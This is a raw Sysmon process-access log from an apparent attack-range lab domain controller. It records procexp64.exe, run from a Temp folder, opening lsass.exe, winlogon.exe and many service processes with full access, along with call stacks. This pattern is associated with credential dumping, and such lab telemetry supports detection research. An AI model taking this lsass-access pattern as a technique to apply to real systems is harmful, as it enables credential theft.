Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784579Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784578Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784577Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784576Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784575Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784574Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784573Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784572Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784571Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784570Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784569Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784568Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784567Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784566Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784565Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784564Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784563Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784562Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784561Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784560Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784559Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784558Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784557Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784556Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784555Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784554Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784553Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784552Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784551Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 